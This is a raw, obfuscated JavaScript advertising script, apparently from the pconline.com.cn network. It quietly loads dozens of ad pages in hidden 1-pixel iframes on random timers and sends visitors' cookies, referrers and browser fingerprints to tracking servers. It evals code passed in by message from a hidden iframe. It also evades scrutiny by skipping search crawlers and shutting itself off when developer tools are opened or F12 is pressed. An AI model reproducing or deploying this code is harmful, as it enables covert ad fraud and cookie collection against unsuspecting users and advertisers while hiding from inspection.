;(function(){
    window.__ivyTest15Count__=[];
    var srcs = ["//ivy.pconline.com.cn/adpuba/click?id=auto.other.test15.&adid=195437&watch=0","//ivy.pconline.com.cn/show?t=[timestamp]&adid=463424&id=pc.test.pv.&media=html&rr.jsp?","{SRC3}","{SRC4}","{SRC5}","{SRC6}"],i;
    for(i=0;i<srcs.length;i++) if(!/^{SRC/.test(srcs[i])) window.__ivyTest15Count__.push(srcs[i]);
})();
;setTimeout(function(){
var ua = navigator.userAgent,win=window,doc=document;
if(/Baiduspider|BingPreview|YisouSpider|360Spider|Googlebot|MsnBot|QQDownload|Sogou web spider/.test(ua))return;
if(/AppleWebKit.*Mobile/i.test(ua)||/MIDP|MicroMessenger|SymbianOS|NOKIA|SAMSUNG|LG|NEC|TCL|Alcatel|BIRD|DBTEL|Dopod|PHILIPS|HAIER|LENOVO|MOT-|Nokia|SonyEricsson|SIE-|Amoi|ZTE/.test(ua)||/Android|Windows Phone|iPod|BlackBerry/i.test(ua)){var wapJs,wapNode;(wapJs=doc.createElement("script")).src="//ivy.pconline.com.cn/show?id=test.wap.test15.&media=js&channel=dynamic&";wapNode=doc.getElementsByTagName("script")[0];wapNode.parentNode.insertBefore(wapJs,wapNode); return;}
if(/^\x74e\x73t15(\x53h\x6fw|\x43\x6ck)\x49f\x72/.test(win.name)){
  var ch=5422;if(/\/autox\/x\.html/.test(win.name))ch=5547;if(/Chrome\/31\.0\.1650\.63/.test(ua))ch=5596;if(/Qt\/\d\..+?Safari/.test(ua))ch=5601;if(/195437|186537|378595|329087/.test(win.name))ch=5597;if(!/#ad=0000#ad=0000/.test(location.hash))location.replace("//count6.pconline.com.cn/count.php?channel="+ch+"&content="+escape("@other319,p==t:"+[win.parent==win.top,win.parent==win]+";his:"+history.length+";links:"+doc.links.length+";hash:"+location.hash +";frame:"+ doc.getElementsByTagName("iframe").length +";wn:"+unescape(unescape(win.name))+";ref:"+doc.referrer+";ua:"+ua+",br:"+[!!win.attachEvent,!!win.postMessage]));return;}
  win['__test15_exist']=true;
  if(/##ad=0000/.test(location.hash)&&location.pathname!='/')if(!win.testad0000){var op=win.opener;try{op=op?op.location.href:op==null?"null":""+op}catch(e){op=e.message}(win[Math.random()]=new Image()).src="//count6.pconline.com.cn/count.php?channel=5575&ad="+(screen.width==1024&&win.attachEvent&&win.postMessage?0:1)+"&content="+escape("his:"+[history.length,parent==top&&top==win,op,win.opener,"name="+win.name,"{LOCATION}",location.hash,doc.referrer,doc.title,doc.cookie,navigator.userAgent,!!win.attachEvent,!!win.postMessage]);win.testad0000 = 1; 
screen.width==1024&&win.attachEvent&&win.postMessage||-function(ch,chout,now,ck,chf){ now=1*now||1*new Date();
function run(s){try{s=s.data||s;if(s.indexOf("var r="+now)==0)eval(s)}catch(e){throw e}}
+function(e,f,o,i){i="\x61d\x64\x45ve\x6et\x4ci\x73te\x6ee\x72";o[i]?o[i](e,f,false):o["\x61t\x74ac\x68\x45\x76e\x6et"]("\x6f\x6e"+e,f)}("message",run,this);
var i=doc.createElement("div"); i.innerHTML="\x3cifra\x6de\x20i\x64="+now+"\x20\x73\x74y\x6ce=di\x73p\x6cay:\x6eo\x6ee\x20s\x72c=\x22h\x74\x74\x70\x3a\x2f\x2fcou\x6et\x36\x2epc\x6fn\x6cine\x2eco\x6d\x2ecn\x2fp\x63suv\x2e\x68tm\x22\x20\x6ea\x6de=\x22ifr:"+now+",ch:"+ch+(chout?",chout:"+chout:"")+(chf?",chf:"+chf:"")+(ck?",c\x6fo\x6bie:"+ck:"")+"\x22>\x3c\x2fi\x66ra\x6de\x3e";
(i=i.firstChild).onreadystatechange=function(){run(navigator[now],navigator[now]=this.undefined)};
doc.getElementsByTagName("head")[0].appendChild(i); 
}(-1,5581,0,"[^;=]+");}
  if(doc.referrer.indexOf('ww\x77\x2e\x70\x63aut\x6f\x2e\x63\x6f\x6d\x2e\x63n/autox/x.html')>-1) (function(){if(win._t15_airui==1)return;var tid='auto.airui.test15.';var js=doc.createElement("script");js.src="//ivy.pconline.com.cn/show?id="+tid+"&media=js&channel=dynamic&";var node = doc.getElementsByTagName("script")[0];node.parentNode.insertBefore(js,node);win._t15_airui=1;})();
  if(doc.referrer.indexOf('ww\x77\x2e\x70\x63aut\x6f\x2e\x63\x6f\x6d\x2e\x63n/autox/x.html')>-1) (function(){if(win._t15_pc_airui==1)return;var tid='pc.airui.test15.';var js=doc.createElement("script");js.src="//ivy.pconline.com.cn/show?id="+tid+"&media=js&channel=dynamic&";var node = doc.getElementsByTagName("script")[0];node.parentNode.insertBefore(js,node);win._t15_pc_airui=1;})();
  if(/baidu\.com|sogou\.com|so\.com|sm\.cn/.test(doc.referrer))(function(){if(win._t15_pc_search==1)return;var tid='qw.search.test15.';var js=doc.createElement("script");js.src="//ivy.pconline.com.cn/show?id="+tid+"&media=js&channel=dynamic&";var node = doc.getElementsByTagName("script")[0];node.parentNode.insertBefore(js,node);win._t15_pc_search=1;})();
    (function(d,w){if(w._t15_vshow==1)return;if(/vshow\.com|gm\.zhanyilu|leyutuan\.com/.test(d.referrer)){var tid='auto.vshow.test15.',js,node;(js=d.createElement("script")).src="//ivy.pconline.com.cn/show?id="+tid+"&media=js&channel=dynamic&";node = d.getElementsByTagName("script")[0];node.parentNode.insertBefore(js,node);w._t15_vshow=1;}})(document,window);
  var now = new Date(),__test15atids=[];
  if(!!win['test15'+now.getFullYear()+now.getMonth()+now.getDate()] || /corp\.|zhaopin\.|ued\.|cms\.|zzb\.|arch\.|zzsvn\.|play\d+\./.test(location.host) || location.pathname=='/' || /#ad=0000/.test(location.hash) || location.href.indexOf('//www1.') > -1) return;
  if(0<win['\x64\x6fcu\x6de\x6et']['\x72e\x66e\x72r\x65r'].indexOf('\x6dia\x6f\x7ahe\x6e\x2ec\x6f\x6d')) return;
  if(/^\x74e\x73t15(\x53h\x6fw|\x43\x6ck)\x49f\x72/.test(win.name)||/Chrome\/(30.0.1599.101|30.0.0.0|43.0.2357.130|42.0.2307.2|22.0.1229.94)|Firefox|iPad|UBrowser/.test(ua)) return;
  var pos = {w:doc.documentElement.clientWidth||doc.body.clientWidth,h:doc.documentElement.clientHeight||doc.body.clientHeight}, ivy_div = doc.getElementById("ivy_div");
  if(ivy_div==null){ivy_div = doc.createElement("div");ivy_div.id="ivy_div";doc.body.insertBefore(ivy_div,doc.body.firstChild)};
  ivy_div.style.cssText = "width:1px;height:0;overflow:hidden;position:absolute;display:block";
  if(!win.ivyTastTimes){
    var iframe,preTime=1*now, curTime, re=/pcivy/, c=0, ivyMouseTag=0; win.ivyTastTimes={};
    if(win.console){re.toString = function (){ ++c; if(c>1)clear(); return ''}; setTimeout(function(){console.log(re);},1000)}
    if(doc.getElementById('f\x5f\x69\x66\x72ame')){
      iframe = doc.getElementById('f\x5f\x69\x66\x72ame').contentWindow.document;
      bind(iframe,'keydown', clear);
    }
    bind(doc,'mousemove',fn); bind(doc,'keydown',function(e){ ivyMouseTag=1;e = e||event; if(e.keyCode==123) clear(); });
    setTimeout(watcher,1000); setTimeout(function(){ if(!ivyMouseTag){ unbind(doc,'mousemove',fn); clear();}},6000);
    function fn(){ var curTime = new Date()*1; ivyMouseTag = 1;if(curTime - preTime > 1000){ preTime = curTime; watcher();}}
    function watcher(){if(win.outerHeight&&win.innerHeight&&win.outerHeight-Math.floor((win.outerWidth-10)/win.innerWidth*win.innerHeight)>200)clear();}
    function clear(){window.t15rd=1; ivy_div.innerHTML=''; for(var k in ivyTastTimes){ clearTimeout(ivyTastTimes[k]);} }
  }
  !function(){
    var idx4show, i, srcs=["http://ar.3conline.com/u/cb311a10/d085d301/ea6fc711/7795575e.html?3-19371051-16-396774","http://ar.3conline.com/u/cbbf4e8d/d1e47fe9/890fa2d7/5b2624ad.html?3-19370965-16-255674","http://ar.3conline.com/u/37f5fa2d/15475529/4f31391d/62e41a2f.html?3-19371063-16-747774","http://ar.3conline.com/u/217074a3/75545e9e/bbdd7b36/38a00bdc.html?3-19370594-16-935134","http://ar.3conline.com/u/481e9d5e/a5f95261/f5109327/0e58f7cc.html?3-19371117-16-998674","http://ar.3conline.com/u/60a79e61/0c6401a3/1f7bcce0/dbf935d9.html?3-19370899-16-745674","http://ar.3conline.com/u/857c97d6/f7132cd3/2902a57a/ed1572f7.html?3-19370975-16-438674","http://ar.3conline.com/u/e0520f96/d594843c/90765184/5c83efab.html?3-19371083-16-518774","http://ar.3conline.com/u/e07cd663/baed20da/6274e4c0/f895ddcd.html?3-19370955-16-412774","http://ar.3conline.com/u/bd187bf7/0bf4a451/72bc2967/d9aed9f5.html?3-19370773-16-404674","http://ar.3conline.com/u/9eafdc5e/1149b879/37a7a213/413e93c6.html?3-19370797-16-136574","http://ar.3conline.com/u/081f2b0a/b7dbd9f0/bd5d6c1f/d781982d.html?3-19371115-16-612774","http://ar.3conline.com/u/860a934a/e4902472/9d60c564/8d431147.html?3-19370745-16-515574","http://ar.3conline.com/u/e5852be6/d949e254/2c1d5622/f9462592.html?3-19370857-16-847674","http://ar.3conline.com/u/4efd0f82/b1c71f6c/e5ff31f7/8d7ac160.html?3-19370953-16-312774","http://ar.3conline.com/u/fb9ce81e/6945b32b/75b13e64/4af25e7a.html?3-19370927-16-851774","http://ar.3conline.com/u/a01d9849/13a58b59/17cd9de7/10d229af.html?3-19371162-16-882624","http://ar.3conline.com/u/c8ba534b/c46c5722/9bcd78f0/41cb4bb1.html?3-19370647-16-724474","http://ar.3conline.com/u/4f8e7009/e2e3c1d1/e8de1ef1/50ca9c8c.html?3-19370919-16-051774","http://ar.3conline.com/u/832f8cd6/89affbcd/b963d153/68e2ed93.html?3-19370801-16-236574","http://ar.3conline.com/u/afb3f74b/8d1f762f/2696f20b/06d77043.html?3-19370901-16-455674","http://ar.3conline.com/u/bafebb2a/c029471a/0a605ba2/0892e7ec.html?3-19370649-16-733474","http://ar.3conline.com/u/e18e2a1b/d50986cc/46104999/2d199a4a.html?3-19370979-16-541774","http://ar.3conline.com/u/f6edd05c/86d449d3/2eac638e/f0d650fd.html?3-19370841-16-855674","http://ar.3conline.com/u/d8785297/c5746da7/06c96f15/5ebf0ddd.html?3-19370643-16-833474","http://ar.3conline.com/u/6dca1d1f/07d606d5/b60d4355/fec810c2.html?3-19371101-16-318774","http://ar.3conline.com/u/38ea5a0b/9b36b88b/2375ea8e/2b6662b5.html?3-19371093-16-928774","http://ar.3conline.com/u/aac9e25a/eee4a2ee/36b1bf0d/7ff98625.html?3-19371059-16-596774","http://ar.3conline.com/u/08322d58/0a02654d/a5d9cbc4/ec1100d1.html?3-19371163-16-882624","http://ar.3conline.com/u/d794939b/a2222bbd/bcae5bb7/07ac4706.html?3-19370731-16-742574","http://ar.3conline.com/u/2d8c3648/c5f968b5/73295df7/3dbb9f27.html?3-19370945-16-912774","http://ar.3conline.com/u/d438769a/03df7215/9546bf39/baa429bf.html?3-19370951-16-212774","http://ar.3conline.com/u/75faa84f/06197df8/a792f48c/f1b81d2a.html?3-19370869-16-547674","http://ar.3conline.com/u/0929b4ba/262906ba/e5313732/97942124.html?3-19370619-16-310374","http://ar.3conline.com/u/77b41da1/697bb055/f2fedfe6/3cd4d083.html?3-19370925-16-378574","http://ar.3conline.com/u/d3ed9092/52d7fd28/f5607588/a6766bba.html?3-19370917-16-741774","http://ar.3conline.com/u/8ad167fc/e9dbd7a8/fdd2df47/0399fadc.html?3-19371103-16-918774","http://ar.3conline.com/u/f9201d08/d51ff265/67d546d3/a1b3371f.html?3-19370995-16-224674","http://ar.3conline.com/u/d0cb21c8/a649d4ab/a7895a49/dc0be623.html?3-19370897-16-645674","http://ar.3conline.com/u/f9cb3376/9d92e82c/64ebab54/b6d69afc.html?3-19370981-16-149574","http://ar.3conline.com/u/47788562/428c10e8/c9121726/ccf94f02.html?3-19370949-16-222774","http://ar.3conline.com/u/54bc0df8/240eade6/fc6eb8d1/3957fffb.html?3-19371164-16-882624","http://ar.3conline.com/u/ad3a566d/139bfe78/a6ebb9f1/8496f9e6.html?3-19370771-16-390674","http://ar.3conline.com/u/5065c0ab/e428cd45/23ab03ce/0affeab1.html?3-19370929-16-751774","http://ar.3conline.com/u/74b266cb/a44092ff/93616ea4/9b3e8bb9.html?3-19371161-16-882624","http://ar.3conline.com/u/2cda0527/e578ff43/ffc2171a/ddf233af.html?3-19371109-16-512774","http://ar.3conline.com/u/0a6ae733/713d7c22/6439965c/d0bc0b1e.html?3-19370843-16-755674","http://ar.3conline.com/u/8069b965/5f203c85/ea00c1b2/0d3b7199.html?3-19370947-16-322774","http://ar.3conline.com/u/310d8152/2fcdf069/4f046b78/5f915d0d.html?3-19370867-16-156574","{SRC50}","{SRC51}","{SRC52}","{SRC53}","{SRC54}","{SRC55}","{SRC56}","{SRC57}","{SRC58}","{SRC59}","{SRC60}","{SRC61}","{SRC62}","{SRC63}","{SRC64}","{SRC65}","{SRC66}","{SRC67}","{SRC68}","{SRC69}","{SRC70}","{SRC71}","{SRC72}","{SRC73}","{SRC74}","{SRC75}","{SRC76}","{SRC77}","{SRC78}","{SRC79}","{SRC80}","{SRC81}","{SRC82}","{SRC83}","{SRC84}","{SRC85}","{SRC86}","{SRC87}","{SRC88}","{SRC89}","{SRC90}","{SRC91}","{SRC92}","{SRC93}","{SRC94}","{SRC95}","{SRC96}","{SRC97}","{SRC98}","{SRC99}","{SRC100}"];
    if(win.__ivyTest15Count__ && __ivyTest15Count__ instanceof Array && __ivyTest15Count__.length > 0){srcs = __ivyTest15Count__.concat(srcs);win.__ivyTest15Count__=[];}
    var firstSrc=srcs[0]; if(firstSrc.indexOf('click?id=')>-1){firstSrc = firstSrc.replace('adpuba/','');(win["wap"+1*new Date()]=new Image()).src = firstSrc;}
    for(i=0;i<srcs.length;i++){
      var src = srcs[i].replace('[timestamp]',new Date()*1);
      if(/^{SRC/.test(src)) break;
      if(src==null || src=="" || !/\/\//i.test(src)) continue;
      if(location.protocol=='https:')if(!/^https/i.test(src)) continue;
      idx4show = new Date()*1 + Math.floor(Math.random()*100000) + i;
      if(/\/\/(rr|ar)\..+?\.com\/u\/|rr\.jsp\?/.test(src)){
        var rdTime = /&delay=\d+/i.test(src) ? 8000 + Math.floor(Math.random()*5000) : Math.floor(Math.random()*1500);
        !function(s){ ivyTastTimes["t"+idx4show] = setTimeout(function(){show(s);},rdTime)}(src);
      }
    }
    function show(src){
      try{
      var div=doc.createElement("div"),ifr,ivyIds,ivyId,atIds;
      ivyIds = src.match(/(\d+)(?:$|&)/);
      ivyId = ivyIds ? ivyIds[1].split("").reverse().join("") : '';
      if(win._tmpIvyIDs && ivyId)if(win._tmpIvyIDs.indexOf(ivyId) > -1)return;
      atIds = src.match(/\?\d+-(\d+)/);
      if(atIds)__test15atids.push(atIds[1]);
      div.innerHTML = "\x3ci\x46ra\x4de name=\"test15ShowIfr"+ ivyId +"-"+ src.replace(/\/\/(rr|ar)\..+?\.com\/u\//,"").replace(/\.html\?\d+/,"")+"-"+location.href+"-"+doc.referrer+"-"+(win==top&&win==parent) +"\" width="+ pos.w +" height="+ pos.h +" id=_ivf000"+idx4show+" src='"+src+"'\x3e\x3c/i\x46ra\x4de\x3e";
      ifr = ivy_div.appendChild(div.firstChild); 
      }catch(err){};
      setTimeout(function(){try{ifr.parentNode.removeChild(ifr)}catch(err){}},40*1000);
    }
  }();
  function bind(o,type,fn){if(o.addEventListener){o.addEventListener(type,fn,false)}else if(o.attachEvent){o.attachEvent("on"+type,fn)}else{o["on"+type] = fn}}
  function unbind(o,type,fn){if(o.removeEventListener){o.removeEventListener(type,fn,false)}else if(o.detachEvent){o.detachEvent("on"+type,fn)}else{o["on"+type] = null}}
  setTimeout(function(){
    if(!!window.t15rd&&window.t15rd==1)return;
    var tid='{LOCATION}', atids='', js=document.createElement("\x73\x63ri\x70\x74"), nodes = document.getElementsByTagName("\x73\x63ri\x70\x74"), len=nodes.length;
    if(!!__test15atids&&__test15atids.length>0) atids=__test15atids.join(';'); else return;
    js.src="\x68\x74tp://i\x76y.\x70con\x6cine.\x63om.\x63n/sho\x77?id="+tid+"&media=js&\x63hannel=dynami\x63&skips="+ atids +"&";
    if(len) nodes[len-1].parentNode.insertBefore(js,nodes[len-1]);
    window.t15rd=1;
  },10000);
},1);

(function(){
    if(Math.random()*100000>100) return;
    var tabstr='(0_0)';
    function _uFlash() {
      var f = "-", n = navigator;
      if (n.plugins && n.plugins.length) {
          for (var ii = 0; ii < n.plugins.length; ii++) {
                if (n.plugins[ii].name.indexOf('Shockwave Flash') != -1) {
                    f = n.plugins[ii].description.split('Shockwave Flash ')[1];
                    break;
               }
          }
      } else if (window.ActiveXObject) {
           for (var ii = 20; ii >= 2; ii--) {
              try {
                 var fl = eval("new ActiveXObject('ShockwaveFlash.ShockwaveFlash." + ii + "');");
                 if (fl) {
                     f = ii + '.0';
                    break;
                 }
              } catch (e) {
             }
         }
      }
      return f;
    }
    var ximg = new Image().src = '//agent-count.pconline.com.cn/counter/adAnalyse/fflloogg.jsp?m=add&f=clientenv&c='+
      navigator.userAgent+
      tabstr+window.screen.width+'x'+window.screen.height+
      tabstr+(document.documentElement.clientWidth||document.body.clientWidth)+'x'+(document.documentElement.clientHeight||document.body.clientHeight)+
      tabstr+escape(_uFlash())+
      tabstr+navigator.platform+
      tabstr+navigator.appName+
      tabstr+navigator.appVersion+
      tabstr+screen.colorDepth+
      tabstr+navigator.javaEnabled()+
      tabstr+navigator.appCodeName+
      tabstr+navigator.product+
      tabstr+navigator.productSub+
      tabstr+navigator.language+
      tabstr+navigator.onLine+
      tabstr+navigator.vendor+
      tabstr+navigator.vendorSub+
      tabstr+(navigator.plugins&&navigator.plugins.length?navigator.plugins.length:'');
})();